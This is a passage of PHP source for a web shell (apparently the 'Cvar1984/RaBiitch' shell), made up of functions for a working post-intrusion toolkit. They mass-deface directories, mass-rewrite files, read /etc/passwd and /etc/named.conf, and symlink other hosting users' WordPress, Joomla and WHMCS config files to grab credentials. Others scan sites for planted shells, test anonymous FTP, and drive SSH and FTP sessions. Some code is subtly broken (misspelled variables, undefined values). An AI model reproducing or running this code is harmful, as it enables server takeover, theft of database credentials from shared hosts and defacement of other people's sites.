  2417. name='tyxxx'><option>Encode</option><option>Decode</option></select>
  2418.        Input : <input name='hexinp' size=50 value='input
  2419. here'><input type=submit value='submit' /><br
  2420. /><br /><hr /><br /><br /></div>";
  2421.     }
  2422. }
  2423. function killme() {
  2424.     global $self;
  2425.     echo "<div id=result><center><h2>Good Bye
  2426. Dear</h2><hr />Where Are U Going? :(
  2427. <br><br><br><hr><br><br>";
  2428.     $me = basename($self);
  2429.     unlink($me);
  2430. }
  2431. function ftp_anonymous_ui() {
  2432.     echo "<div id='result'><center><h2>Anonymous
  2433. FTP
  2434. Scanner</h2><hr></center>
  2435.     <table class=tbl><form method='GET'><tr>
  2436.     <td><textarea name='ftp_anonz' cols=40 rows=25
  2437. class='textarea_edit' required>
  2438.     127.0.0.1
  2439.     ftp.google.com
  2440.     ftp.r00t.com
  2441.     ftp.nekopoi.org</textarea></td></tr>
  2442.     <tr><td><input class='input_big' type='submit'
  2443. value='submit'></td></tr></form></table><br><br><hr><br><br>";
  2444. }
  2445. function ftp_anonymous_bg() {
  2446.     echo "<div
  2447. id=result><center><h2>Result</h2></center><hr
  2448. /><br /><br /><table class=table>";
  2449.     $ftp_list = $_GET['ftp_anonz'];
  2450.     $xftpl    = trim($ftp_list);
  2451.     $xftpl    = explode("\n", $xftpl);
  2452.     foreach($xftpl as $xftp) {
  2453.         $xftp     = str_replace("ftp://", "", $xftp);
  2454.         $conn_ftp = ftp_connect($xftp);
  2455.         $success  = ftp_login($conn_ftp, "anonymous",
  2456. "");
  2457.         if($success) {
  2458.             echo "<tr><td><font
  2459. color=7171C6>$xftp</font></td><td><font
  2460. color=yellow>Successfull</font></td></tr>";
  2461.         } else {
  2462.             echo "<tr><td><font
  2463. color=7171C6>$xftp</font></td><td><font
  2464. color=red>Failed</font></td></tr>";
  2465.         }
  2466.     }
  2467.     echo "</table><br /><br /><hr /><br
  2468. /><br />";
  2469. }
  2470. function mass_deface_ui() {
  2471.     echo "<div id=result><center><h2>Mass
  2472. Deface</h2><hr /><br /><br /><table
  2473. class=tbl><form method='GET'><input name='mm_path'
  2474. type='hidden'
  2475. value=" . $_GET['path'] . "><tr><td>Name
  2476. : <input size=40 name='mass_name'></td></tr>
  2477.    <tr><td><textarea name='mass_cont' cols=80 rows=25
  2478. class='textarea_edit'></textarea></td></tr><tr><td><input
  2479. class='input_big' type=submit value='submit'
  2480. /></td></tr></form></table><br /><br
  2481. /><hr /><br /><br /></div>";
  2482. }
  2483. function mass_deface_bg() {
  2484.     global $sep;
  2485.     $d_path = $_GET['mm_path'];
  2486.     chdir($d_path);
  2487.     $d_file   = $_GET['mass_name'];
  2488.     $d_conten = $_GET['mass_cont'];
  2489.     if(is_dir($d_path)) {
  2490.         chdir($d_path);
  2491.         $d_dirs = array();
  2492.         if($handle = opendir($d_path)) {
  2493.             while(($item = readdir($handle)) !== FALSE) {
  2494.                 if($item == ".") {
  2495.                     continue;
  2496.                 }
  2497.                 if($item == "..") {
  2498.                     continue;
  2499.                 }
  2500.                 if(is_dir($item)) {
  2501.                     array_push($d_dirs, $item);
  2502.                 }
  2503.             }
  2504.         }
  2505.     }
  2506.     echo "<div
  2507. id=result><center><h2>Result</h2></center><hr
  2508. /><br /><br /><table class=tbl>";
  2509.     foreach($d_dirs as $d_dir) {
  2510.         $xd_path = getcwd() . "$sep$d_dir$sep$d_file";
  2511.         if(is_writable($d_dir)) {
  2512.             $handle = fopen($xd_path, "wb");
  2513.             if($handle) {
  2514.                 fwrite($handle, $d_conten);
  2515.             }
  2516.         }
  2517.         echo "<tr><td><font
  2518. color=yellow>$xd_path</font></td></tr>";
  2519.     }
  2520.     echo "</table><br /><br /><hr /><br
  2521. /><br /></div>";
  2522. }
  2523. function symlinkg($usernamexx, $domainxx) {
  2524.     symlink('/home/' . $usernamexx .
  2525. '/public_html/vb/includes/config.php',
  2526. 'Cvar1984/' . $domainxx . '
  2527. =>vBulletin1.txt');
  2528.     symlink('/home/' . $usernamexx . '/public_html/includes/config.php',
  2529. 'Cvar1984/' . $domainxx . '
  2530. =>vBulletin2.txt');
  2531.     symlink('/home/' . $usernamexx .
  2532. '/public_html/forum/includes/config.php', 'Cvar1984/' . $domainxx . '
  2533. =>vBulletin3.txt');
  2534.     symlink('/home/' . $usernamexx .
  2535. '/public_html/cc/includes/config.php',
  2536. 'Cvar1984/' . $domainxx . '
  2537. =>vBulletin4.txt');
  2538.     symlink('/home/' . $usernamexx . '/public_html/inc/config.php',
  2539. 'Cvar1984/' . $domainxx . '
  2540. =>mybb.txt');
  2541.     symlink('/home/' . $usernamexx . '/public_html/config.php',
  2542. 'Cvar1984/'
  2543. . $domainxx . '
  2544. =>Phpbb1.txt');
  2545.     symlink('/home/' . $usernamexx .
  2546. '/public_html/forum/includes/config.php', 'Cvar1984/' . $domainxx . '
  2547. =>Phpbb2.txt');
  2548.     symlink('/home/' . $usernamexx . '/public_html/wp-config.php',
  2549. 'Cvar1984/' . $domainxx . '
  2550. =>Wordpress1.txt');
  2551.     symlink('/home/' . $usernamexx . '/public_html/blog/wp-config.php',
  2552. 'Cvar1984/' . $domainxx . '
  2553. =>Wordpress2.txt');
  2554.     symlink('/home/' . $usernamexx . '/public_html/configuration.php',
  2555. 'Cvar1984/' . $domainxx . '
  2556. =>Joomla1.txt');
  2557.     symlink('/home/' . $usernamexx .
  2558. '/public_html/blog/configuration.php',
  2559. 'Cvar1984/' . $domainxx . '
  2560. =>Joomla2.txt');
  2561.     symlink('/home/' . $usernamexx .
  2562. '/public_html/joomla/configuration.php', 'Cvar1984/' . $domainxx . '
  2563. =>Joomla3.txt');
  2564.     symlink('/home/' . $usernamexx . '/public_html/whm/configuration.php',
  2565. 'Cvar1984/' . $domainxx . '
  2566. =>Whm1.txt');
  2567.     symlink('/home/' . $usernamexx .
  2568. '/public_html/whmc/configuration.php',
  2569. 'Cvar1984/' . $domainxx . '
  2570. =>Whm2.txt');
  2571.     symlink('/home/' . $usernamexx .
  2572. '/public_html/support/configuration.php', 'Cvar1984/' . $domainxx . '
  2573. =>Whm3.txt');
  2574.     symlink('/home/' . $usernamexx .
  2575. '/public_html/client/configuration.php', 'Cvar1984/' . $domainxx . '
  2576. =>Whm4.txt');
  2577.     symlink('/home/' . $usernamexx .
  2578. '/public_html/billings/configuration.php', 'Cvar1984/' . $domainxx . '
  2579. =>Whm5.txt');
  2580.     symlink('/home/' . $usernamexx .
  2581. '/public_html/billing/configuration.php', 'Cvar1984/' . $domainxx . '
  2582. =>Whm6.txt');
  2583.     symlink('/home/' . $usernamexx .
  2584. '/public_html/clients/configuration.php', 'Cvar1984/' . $domainxx . '
  2585. =>Whm7.txt');
  2586.     symlink('/home/' . $usernamexx .
  2587. '/public_html/whmcs/configuration.php', 'Cvar1984/' . $domainxx . '
  2588. =>Whm8.txt');
  2589.     symlink('/home/' . $usernamexx .
  2590. '/public_html/order/configuration.php', 'Cvar1984/' . $domainxx . '
  2591. =>Whm9.txt');
  2592.     symlink('/home/' . $usernamexx . '/public_html/admin/conf.php',
  2593. 'Cvar1984/' . $domainxx . '
  2594. =>5.txt');
  2595.     symlink('/home/' . $usernamexx . '/public_html/admin/config.php',
  2596. 'Cvar1984/' . $domainxx . '
  2597. =>4.txt');
  2598.     symlink('/home/' . $usernamexx . '/public_html/conf_global.php',
  2599. 'Cvar1984/' . $domainxx . '
  2600. =>invisio.txt');
  2601.     symlink('/home/' . $usernamexx . '/public_html/include/db.php',
  2602. 'Cvar1984/' . $domainxx . '
  2603. =>7.txt');
  2604.     symlink('/home/' . $usernamexx . '/public_html/connect.php',
  2605. 'Cvar1984/' . $domainxx . '
  2606. =>8.txt');
  2607.     symlink('/home/' . $usernamexx . '/public_html/mk_conf.php',
  2608. 'Cvar1984/' . $domainxx . '
  2609. =>mk-portale1.txt');
  2610.     symlink('/home/' . $usernamexx . '/public_html/include/config.php',
  2611. 'Cvar1984/' . $domainxx . '
  2612. =>12.txt');
  2613.     symlink('/home/' . $usernamexx . '/public_html/settings.php',
  2614. 'Cvar1984/' . $domainxx . '
  2615. =>Smf.txt');
  2616.     symlink('/home/' . $usernamexx .
  2617. '/public_html/includes/functions.php',
  2618. 'Cvar1984/' . $domainxx . '
  2619. =>phpbb3.txt');
  2620.     symlink('/home/' . $usernamexx . '/public_html/include/db.php',
  2621. 'RaBiitch/' . $domainxx . '
  2622. =>infinity.txt');
  2623. }
  2624. function config_grabber_bg() {
  2625.     global $sym_htaccess, $sym_php_ini;
  2626.     mkdir('RaBiitch', 0777);
  2627.     symlink("/", "RaBiitch/root");
  2628.     $htaccess = fopen('RaBiitch/.htaccess', 'wb');
  2629.     fwrite($htaccess, $sym_htaccess);
  2630.     $php_ini_x = fopen('Cvar1984/php.ini', 'wb');
  2631.     fwrite($php_ini_x, $sym_php_ini);
  2632.     $usr = explode("\n", $_POST['user_z_list']);
  2633.     foreach($usr as $uzer) {
  2634.         $u_er = trim($uzer);
  2635.         symlinggg($u_er);
  2636.     }
  2637.     echo "<script>window.open('Cvar1984/',
  2638. '_blank');</script>";
  2639.     alert('Config Grab compted. Check configs in direcory Cvar1984');
  2640. }
  2641. if(isset($_POST['user_z_list'])) {
  2642.     config_grabber_bg();
  2643. }
  2644. function config_grabber_ui() {
  2645.     if(file('/etc/passwd')) {
  2646. ?><script>alert("/etc/named.conf Not Found, Its
  2647. alternative method.");</script><div
  2648. id=result><center><h2>Config
  2649. Grabber</h2><hr><br><br><table
  2650. class=tbl><form
  2651. method=POST><tr><td><textarea spellcheck=false
  2652. class='textarea_edit' rows=15 cols=60  name=user_z_list><?php
  2653.         $users = file('/etc/passwd');
  2654.         foreach($users as $user) {
  2655.             $user = explode(':', $user);
  2656.             echo $user[0] . "\n";
  2657.         }
  2658. ?></textarea></td></tr><tr><td><input
  2659. type='submit' class='input_big'
  2660. value='submit'/></td></tr></form></table><br
  2661. /><br
  2662. /><hr /><br /><br /><hr /></div><?php
  2663.     } else {
  2664.         alert(" File Not Found : /etc/passwd ");
  2665.     }
  2666. }
  2667. function symlinggg($user) {
  2668.     symlink('/home/' . $usernamexx .
  2669. '/public_html/blog/configuration.php',
  2670. "Cvar1984/" . $user . " =>blog/configuration.php");
  2671.     symlink('/home/' . $user . '/public_html/forum/includes/config.php',
  2672. "Cvar1984/" . $user . "
  2673. =>forum/includes/config.php");
  2674.     symlink("/home/" . $user .
  2675. "/public_html/wp-config.php", "Cvar1984/" . $user .
  2676. " =>wp-config.php");
  2677.     symlink("/home/" . $user .
  2678. "/public_html/wordpress/wp-config.php", "Cvar1984/" .
  2679. $user . " =>wordpress/wp-config.php");
  2680.     symlink("/home/" . $user .
  2681. "/public_html/configuration.php", "Cvar1984/" . $user
  2682. .
  2683. " =>configuration.php");
  2684.     symlink("/home/" . $user .
  2685. "/public_html/blog/wp-config.php", "Cvar1984/" . $user
  2686. . " =>blog/wp-config.php");
  2687.     symlink("/home/" . $user .
  2688. "/public_html/joomla/configuration.php", "Cvar1984/" .
  2689. $user . " =>joomla/configuration.php");
  2690.     symlink("/home/" . $user .
  2691. "/public_html/vb/includes/config.php", "Cvar1984/" .
  2692. $user . " =>vb/includes/config.php");
  2693.     symlink("/home/" . $user .
  2694. "/public_html/includes/config.php", "Cvar1984/" .
  2695. $user
  2696. . " =>includes/config.php");
  2697.     symlink("/home/" . $user .
  2698. "/public_html/conf_global.php", "Cvar1984/" . $user .
  2699. " =>conf_global.php");
  2700.     symlink("/home/" . $user .
  2701. "/public_html/inc/config.php", "Cvar1984/" . $user .
  2702. " =>inc/config.php");
  2703.     symlink("/home/" . $user .
  2704. "/public_html/config.php", "Cvar1984/" . $user .
  2705. "
  2706. =>config.php");
  2707.     symlink("/home/" . $user .
  2708. "/public_html/Settings.php", "Cvar1984/" . $user .
  2709. " =>/Settings.php");
  2710.     symlink("/home/" . $user .
  2711. "/public_html/sites/default/settings.php", "Cvar1984/"
  2712. . $user . " =>sites/default/settings.php");
  2713.     symlink("/home/" . $user .
  2714. "/public_html/whm/configuration.php", "Cvar1984/" .
  2715. $user . " =>whm/configuration.php");
  2716.     symlink("/home/" . $user .
  2717. "/public_html/whmcs/configuration.php", "Cvar1984/" .
  2718. $user . " =>whmcs/configuration.php");
  2719.     symlink("/home/" . $user .
  2720. "/public_html/support/configuration.php", "Cvar1984/"
  2721. .
  2722. $user . " =>support/configuration.php");
  2723.     symlink("/home/" . $user .
  2724. "/public_html/whmc/WHM/configuration.php", "Cvar1984/"
  2725. . $user . " =>whmc/WHM/configuration.php");
  2726.     symlink("/home/" . $user .
  2727. "/public_html/whm/WHMCS/configuration.php",
  2728. "Cvar1984/"
  2729. . $user . "
  2730. =>whm/WHMCS/configuration.php");
  2731.     symlink("/home/" . $user .
  2732. "/public_html/whm/whmcs/configuration.php",
  2733. "Cvar1984/"
  2734. . $user . "
  2735. =>whm/whmcs/configuration.php");
  2736.     symlink("/home/" . $user .
  2737. "/public_html/support/configuration.php", "Cvar1984/"
  2738. .
  2739. $user . " =>support/configuration.php");
  2740.     symlink("/home/" . $user .
  2741. "/public_html/clients/configuration.php", "Cvar1984/"
  2742. .
  2743. $user . " =>clients/configuration.php");
  2744.     symlink("/home/" . $user .
  2745. "/public_html/client/configuration.php", "Cvar1984/" .
  2746. $user . " =>client/configuration.php");
  2747.     symlink("/home/" . $user .
  2748. "/public_html/clientes/configuration.php", "Cvar1984/"
  2749. . $user . " =>clientes/configuration.php");
  2750.     symlink("/home/" . $user .
  2751. "/public_html/cliente/configuration.php", "Cvar1984/"
  2752. .
  2753. $user . " =>cliente/configuration.php");
  2754.     symlink("/home/" . $user .
  2755. "/public_html/clientsupport/configuration.php",
  2756. "Cvar1984/" . $user . "
  2757. =>clientsupport/configuration.php");
  2758.     symlink("/home/" . $user .
  2759. "/public_html/billing/configuration.php", "Cvar1984/"
  2760. .
  2761. $user . " =>billing/configuration.php");
  2762.     symlink("/home/" . $user .
  2763. "/public_html/admin/config.php", "Cvar1984/" . $user .
  2764. " =>admin/config.php");
  2765. }
  2766. function sym_xxx() {
  2767.     global $sym_htaccess, $sym_php_ini;
  2768.     mkdir('Cvar1984', 0777);
  2769.     symlink("/", "Cvar1984/root");
  2770.     $htaccess = @fopen('Cvar1984/.htaccess', 'w');
  2771.     fwrite($htaccess, $sym_htaccess);
  2772.     $php_ini_x = fopen('Cvar1984/php.ini', 'w');
  2773.     fwrite($php_ini_x, $sym_php_ini);
  2774.     $akps = implode(file("/etc/named.conf"));
  2775.     if(!$akps) {
  2776.         config_grabber_ui();
  2777.     } else {
  2778.         $usrd = array();
  2779.         foreach($akps as $akp) {
  2780.             if(eregi("zone", $akp)) {
  2781.                 preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  2782.                 flush();
  2783.                 if(strlen(trim($akpzz[1][0])) > 2) {
  2784.                     $user =
  2785. posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
  2786.                     symlinkg($akpzz[1][0], $user['name']);
  2787.                     flush();
  2788.                 }
  2789.             }
  2790.         }
  2791.     }
  2792. }
  2793. function sym_link() {
  2794.     global $sym_htaccess, $sym_php_ini;
  2795.     cmd('rm -rf CVAR');
  2796.     mkdir('CVAR', 0755);
  2797.     $usrd     = array();
  2798.     $akps     = implode(file("/etc/named.conf"));
  2799.     $htaccess = fopen('CVAR/.htaccess', 'w');
  2800.     fwrite($htaccess, $sym_htaccess);
  2801.     $php_ini_x = fopen('CVAR/php.ini', 'w');
  2802.     fwrite($php_ini_x, $sym_php_ini);
  2803.     symlink("/", "CVAR/root");
  2804.     if(!$file) {
  2805.         echo "<script>alert('Bind File /etc/passwd Not Found.
  2806. Its alternative Method')</script>";
  2807.         echo "<div
  2808. id=result><center><h2>SymLink</h2></center><hr
  2809. /><br /><br /><table
  2810. class='table'><tr><th>Users</th><th>Exploit</th></tr>";
  2811.         $users = file('/etc/passwd');
  2812.         foreach($users as $user) {
  2813.             $user = explode(':', $user);
  2814.             echo "<tr><td>" . $user[0] .
  2815. "</td><td><a
  2816. href='CVAR/root/home/" . $user[0] . "/public_html/'
  2817. target=_blank>SymLink</tr>";
  2818.         }
  2819.         echo
  2820. "</table><br><br><hr><br><br></div>";
  2821.     } else {
  2822.         echo "<table
  2823. class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
  2824.         foreach($akps as $akp) {
  2825.             if(eregi("zone", $akp)) {
  2826.                 preg_match_all('#zone "(.*)" #', $akp, $akpzz);
  2827.                 flush();
  2828.                 if(strlen(trim($akpzz[1][0])) > 2) {
  2829.                     $user =
  2830. posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
  2831.                     echo "<tr><td><a
  2832. href=http://www." . $akpzz[1][0] . "
  2833. target=_blank>" . $akpzz[1][0] . "</a><td>"
  2834. .
  2835. $user['name'] . "</td><td><a
  2836. href='CVAR/root/home/" . $user['name'] . "/public_html/'
  2837. target=_blank>SymLink</a></td></tr></table>";
  2838.                     flush();
  2839.                 }
  2840.             }
  2841.         }
  2842.     }
  2843. }
  2844. function shell_finder_ui() {
  2845.     echo "<div id=result><center><h2>SH3LL
  2846. SCANNER</h2><hr /><br /><br /><br /><form
  2847. method='GET'>URL : <input size=50 name='sh311_scanx'
  2848. value='http://www.facebook.com/'><input type='submit'
  2849. value='Submit' /></form><br /><br /><hr
  2850. /><br /><br />";
  2851. }
  2852. function shell_finder_bg() {
  2853.     $sh_url = $_GET['sh311_scanx'];
  2854.     echo "
  2855. <div id=result><center><h2>SHELL
  2856. SCAN</h2><hr /><br /><br /><table
  2857. class='table'>";
  2858.     $ShellZ = array(
  2859.         "x.jpg.php",
  2860.         "indoXploit.php",
  2861.         "x.php",
  2862.         "ini.php",
  2863.         "c99.php",
  2864.         "c100.php",
  2865.         "baby.php",
  2866.         "exp.php",
  2867.         "gb.php",
  2868.         "html.php",
  2869.         "r57.php",
  2870.         "php.php",
  2871.         "b374k.php",
  2872.         "indoxploit.php",
  2873.         "c22.php",
  2874.         "IndoXploit.php",
  2875.         "sym.php",
  2876.         "adminer.php",
  2877.         "r00t.php",
  2878.         "webr00t.php",
  2879.         "kontol.php",
  2880.         "ref.php",
  2881.         "ws.php",
  2882.         "qwerty.php",
  2883.         "sql.php",
  2884.         "cpanel.php",
  2885.         "wso.php",
  2886.         "gg.php",
  2887.         "ghs.php",
  2888.         "lonte.php",
  2889.         "mmk.php",
  2890.         "mmek.php",
  2891.         "error_log.php",
  2892.         "error.php",
  2893.         "garuda.php",
  2894.         "s.php",
  2895.         "404.php",
  2896.         "aarya.php",
  2897.         "yellowshell.php",
  2898.         "ddos.php",
  2899.         "madspot.php",
  2900.         "1337.php",
  2901.         "31337.php",
  2902.         "WSO.php",
  2903.         "dz.php",
  2904.         "cpn.php",
  2905.         "sh3ll.php",
  2906.         "mysql.php",
  2907.         "killer.php",
  2908.         "cgishell.pl",
  2909.         "dz0.php",
  2910.         "whcms.php",
  2911.         "vb.php",
  2912.         "gaza.php",
  2913.         "d0mains.php",
  2914.         "changeall.php",
  2915.         "h4x0r.php",
  2916.         "L3b.php",
  2917.         "zz.php",
  2918.         "aa.php",
  2919.         "paw.php",
  2920.         "crot.php",
  2921.         "upz.php",
  2922.         "crotz.php",
  2923.         "mini.php",
  2924.         "crots.php",
  2925.         "config.php",
  2926.         "koneksi.php",
  2927.         "ups.php",
  2928.         "shell.php",
  2929.         "uploads.php",
  2930.         "shell.asp",
  2931.         "haha.php",
  2932.         "idx.php",
  2933.         "d00r.php",
  2934.         "12.php",
  2935.         "conf.php",
  2936.         "d0r.php",
  2937.         "pac.php",
  2938.         "z.php",
  2939.         "cmd.asp",
  2940.         "n45ht.php",
  2941.         "3213.php",
  2942.         "124.php",
  2943.         "312.php",
  2944.         "askdjh.php",
  2945.         "nasth.php",
  2946.         "bhtsas.php",
  2947.         "nas.php",
  2948.         "as.php",
  2949.         "lol.php",
  2950.         "pacman.php",
  2951.         "idx.php",
  2952.         "bht.php",
  2953.         "asu.php",
  2954.         "oke.php",
  2955.         "hehe.php",
  2956.         "1n7ext.php",
  2957.         "home.php",
  2958.         "ff.php",
  2959.         "ss.php",
  2960.         "asd.php",
  2961.         "sad.php",
  2962.         "c0r0.php",
  2963.         "tats.php",
  2964.         "cipay.php",
  2965.         "library.php",
  2966.         "rabiitch.php",
  2967.         "aku.php",
  2968.         "dor.php",
  2969.         "ii.php",
  2970.         "alvin.php",
  2971.         "4lv1n.php",
  2972.         "db.php",
  2973.         "sh3ll.asp",
  2974.         "b374k-2.2.php",
  2975.         "m1n1.php",
  2976.         "b374km1n1.php"
  2977.     );
  2978.     foreach($ShellZ as $shell) {
  2979.         $urlzzx = $sh_url . $shell;
  2980.         if(function_exists('curl_init')) {
  2981.             echo "<tr><td
  2982. style='text-align:left'><font
  2983. color=orange>Checking : </font> <font color=7171C6> $urlzzx
  2984. </font></td>";
  2985.             $ch = curl_init($urlzzx);
  2986.             curl_setopt($ch, CURLOPT_NOBODY, true);
  2987.             curl_exec($ch);
  2988.             $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  2989.             curl_close($ch);
  2990.             if($status_code == 200) {
  2991.                 echo "<td style='text-align:left'><font
  2992. color=yellow>Found</font></td></tr>";
  2993.             } else {
  2994.                 echo "<td style='text-align:left'><font
  2995. color=red>Not Found...</font></td></tr>";
  2996.             }
  2997.         } else {
  2998.             echo "<font color=red>cURL Not Found
  2999. </font>";
  3000.             break;
  3001.         }
  3002.     }
  3003.     echo
  3004. "</table><br><br><hr><br><br></div>";
  3005. }
  3006. function code_in_ui() {
  3007.     global $sep;
  3008.     $mode   = $_POST['modexxx'];
  3009.     $ftype  = $_POST['ffttype'];
  3010.     $c_cont = $_POST['code_cont'];
  3011.     $ppp    = $_POST['path'];
  3012.     if(isset($_POST['modexxx']) && isset($_POST['path'])
  3013. &&
  3014. isset($_POST['ffttype']) && isset($_POST['code_cont']) &&
  3015. $mode != "" && $ftype != "" && $c_cont
  3016. != "" && $ppp != "") {
  3017.         echo "<div id=result><center><h2>Mass
  3018. Rewrite Successfully</h2></center><table
  3019. class=tbl>";
  3020.         switch($mode) {
  3021.             case "Apender":
  3022.                 $mmode = "a";
  3023.                 break;
  3024.             case "Rewrite":
  3025.                 $mmode = "w";
  3026.                 break;
  3027.         }
  3028.         if($handle = opendir($ppp)) {
  3029.             while(($c_file = readdir($handle)) !== False) {
  3030.                 if((preg_match("/$ftype" . '$' . '/', $c_file,
  3031. $matches) != 0) && (preg_match('/' . $c_file . '$/', $self,
  3032. $matches) != 1)) {
  3033.                     echo "<tr><td><font
  3034. color=red>$ppp$sep$c_file</font></td></tr>";
  3035.                     $fd = fopen($ppp . $sep . $c_file, $mmode);
  3036.                     if($fd) {
  3037.                         fwrite($fd, $c_cont);
  3038.                     } else {
  3039.                         alert("Error. Access Denied");
  3040.                     }
  3041.                 }
  3042.             }
  3043.         }
  3044.         echo
  3045. "</table><br><br><hr><br><br></div>";
  3046.     } else {
  3047. ?>
  3048.         <div id=result><center><h2>Mass
  3049. Rewrite</h2></center><hr><br><br><table
  3050. class=table><form method='POST'><input type='hidden'
  3051. name='path' value="<?php
  3052.         echo getcwd();
  3053. ?>"><tr><td>Mode : </td>
  3054.         <td><select style='color:yellow; background-color:black;
  3055. border:1px solid #666;'
  3056. name='modexxx'><option>Rewrite</option><option>Apender</option></select></td></tr><tr><td>File
  3057. Type</td><td><input name='ffttype' value='html'
  3058. size=50></td></tr>
  3059.         <tr><td>Content : </td><td><textarea
  3060. name='code_cont' rows=20 cols=60
  3061. class='textarea_edit'></textarea></td></tr><tr><td></td><td><input
  3062. type=submit value='submit' class='input_big'
  3063. /></td></tr></form></table><br><br><hr><br><br>
  3064.     <?php
  3065.     }
  3066. }
  3067. function ssh_man_ui() {
  3068. ?>
  3069.     <div id=result><center><h2>SSH
  3070. Manager</h2><hr /><br /><br /><table
  3071. class=table><form method='GET'><tr><td>HOST :
  3072. </td><td><input size=50
  3073. name='ssh_host'></td></tr><tr><td>Username :
  3074. </td><td><input size=50
  3075. name='ssh_user'></td></tr><tr><td>Password :
  3076. </td><td><input size=50
  3077. name='ssh_pass'></td></tr><tr><td></td><td><input
  3078. type='submit' value='submit'
  3079. /></form></table></center><br><br><hr><br><br></div>
  3080.     <?php
  3081. }
  3082. function ssh_man_bg() {
  3083.     $ssh_h = $_GET['ssh_host'];
  3084.     $ssh_u = $_GET['ssh_user'];
  3085.     $ssh_p = $_GET['ssh_pass'];
  3086.     if(!function_exists('ssh2_connect')) {
  3087.         alert("Sorry, Function ssh2_connect is not found");
  3088.     }
  3089.     $conn = ssh2_connect($ssh_h, 22);
  3090.     if(!$conn) {
  3091.         alert("SSH Host Not Found");
  3092.     }
  3093.     $log = ssh2_auth_password($conn, $ssh_u, $ssh_p);
  3094.     if(!$log) {
  3095.         alert("SSH Authorication failed");
  3096.     }
  3097.     $shell = ssh2_shell($conn, "bash");
  3098.     if($_GET['ssh_cmd'] != "" && $_GET['ssh_cmd']) {
  3099.         $ssh_cmd = $_GET['ssh_cmd'];
  3100.         fwrite($shell, $ssh_cmd);
  3101.         sleep(1);
  3102.         while($line = fgets($shell)) {
  3103.             flush();
  3104.             echo $line . "\n";
  3105.         }
  3106. ?>
  3107.     <div id=result><center><h2>SSH Shell RaBiitch
  3108. Shell</h2><hr /><br /><br /><textarea
  3109. class='textarea_edit' rows=20 cols=60></textarea>
  3110.     <form method='GET'>CMD : <input name='ssh_cmd'
  3111. size=60><input type='submit' value='submit'
  3112. /></form></center><br><br><hr><br><br></div>
  3113.         <?php
  3114.     } else {
  3115. ?>
  3116.     <div id=result><center><h2>SSH Shell RaBiitch
  3117. Shell</h2><hr /><br /><br /><textarea
  3118. class='textarea_edit' rows=20 cols=60></textarea>
  3119.     <form method='GET'>CMD : <input name='ssh_cmd'
  3120. size=60><input type='submit' value='submit'
  3121. /></form></center><br><br><hr><br><br></div>
  3122.     <?php
  3123.     }
  3124. }
  3125. function ftp_man_ui() {
  3126. ?>
  3127.     <div id=result><center><h2>FTP
  3128. Manager</h2><hr /><br /><br /><table
  3129. class=table><form method='GET'><tr><td>HOST :
  3130. </td><td><input size=50
  3131. name='ftp_host'></td></tr>
  3132.     <tr><td>Username : </td><td><input size=50
  3133. name='ftp_user'></td></tr>
  3134.     <tr><td>Password : </td><td><input size=50
  3135. name='ftp_pass'></td></tr>
  3136.     <tr><td>Path [<font color=red>Optional</font>]
  3137. : </td><td><input name='fpath'
  3138. size=50></td></tr>
  3139.     <tr><td>Upload File From Server [<font
  3140. color=red>Optional</font>] : </td><td><input
  3141. name='upload_file' size=50></td></tr>
  3142.     <tr><td>Download File To Server [<font
  3143. color=red>Optional</font>] : </td><td><input
  3144. name='download_file' size=50></td></tr>
  3145.     <tr><td></td><td><input type='submit'
  3146. value='submit'
  3147. /></form></table></center><br /><br
  3148. /><hr /><br /><br /></div>
  3149.     <?php
  3150. }
  3151. function ftp_man_bg() {
  3152.     echo "<div id=result><center><h2>FTP
  3153. FILEMANAGER</h2></center><hr />";
  3154.     $fhost = $_GET['ftp_host'];
  3155.     $fuser = $_GET['ftp_user'];
  3156.     $fpass = $_GET['ftp_pass'];
  3157.     $fpath = $_GET['fpath'];
  3158.     $upl   = $_GET['upload_file'];
  3159.     $down  = $_GET['download_file'];
  3160.     if($fpath == "") {
  3161.         $fpath = ftp_pwd($conn);
  3162.     }
  3163.     $conn = ftp_connect($fhost);
  3164.     if(!$conn) {
  3165.         alert("FTP Host Not Found!!!");
  3166.     }
  3167.     $log = ftp_login($conn, $fuser, $fpass);
  3168.     if(!$log) {
  3169.         alert("FTP Authorication Failed");
  3170.     }
  3171.     if($upl != "") {
  3172.         $fp = fopen($upl, 'r');
  3173.         if(ftp_fput($conn, $upl, $fp, FTP_ASCII)) {
  3174.             echo "<center><font color=yellow>Successfully
  3175. uploaded <font color=red> $upl </font>
  3176. </font></center>";
  3177.         } else {
  3178.             echo "<center><font color=red>There was a
  3179. problem while uploading <font color=yellow> $upl
  3180. </font></font></center>";
  3181.         }
  3182.     }
  3183.     if($down != "") {
  3184.         $handle = fopen($down, 'w');
  3185.         if(ftp_fget($conn, $handle, $down, FTP_ASCII, 0)) {
  3186.             echo "<center><font color=yellow>successfully
  3187. written to <font color=red> $down
  3188. </font></font></center>";
  3189.         } else {
  3190.             echo "<center><font color=red>There was a
  3191. problem while downloading <font color=yellow> $down </font> to
  3192. <font color=yellow> $down
  3193. </font></font></center>";
  3194.         }
  3195.     }
  3196.     echo "<table
  3197. class='table'><tr><th>Files</th>";
  3198.     ftp_chdir($fpath);
  3199.     $list = ftp_rawlist($conn, $fpath);
  3200.     foreach($list as $fff) {
  3201.         echo
  3202. "<tr><td><pre>$fff</pre></td></tr>";
  3203.     }
  3204.     echo "</table></div>";
  3205. }
  3206. // Frond End Calls //
  3207. if(isset($_POST['e_file']) && isset($_POST['e_content_n'])) {
  3208.     edit_file_bg();
  3209. } else if(isset($_REQUEST['musik'])) {
  3210.     soundcloud();
  3211. } else if(isset($_REQUEST['logger'])) {
  3212.      ceklog();
  3213. } else if(isset($_REQUEST['ganteng'])) {
  3214.     gantengware();
  3215. } else if(isset($_REQUEST['phpinfo'])) {
  3216.     phpinfo();
  3217. } else if(isset($_REQUEST['rctm'])) {
  3218.     rctm();
  3219. } else if(isset($_REQUEST['idx'])) {
  3220.     idxshell();
  3221. } else if(isset($_REQUEST['xaishell'])) {
  3222.     xaishell();
  3223. } else if(isset($_REQUSET['ngindex'])) {
  3224.     ngindex();
  3225. } else if(isset($_REQUEST['jembud2'])) {
  3226.     jembud2();
  3227. } elseif(isset($_REQUEST['terjemah'])) {
  3228.     terjemah();
  3229. } else if(isset($_REQUEST['cgi'])) {
  3230.     cgi();
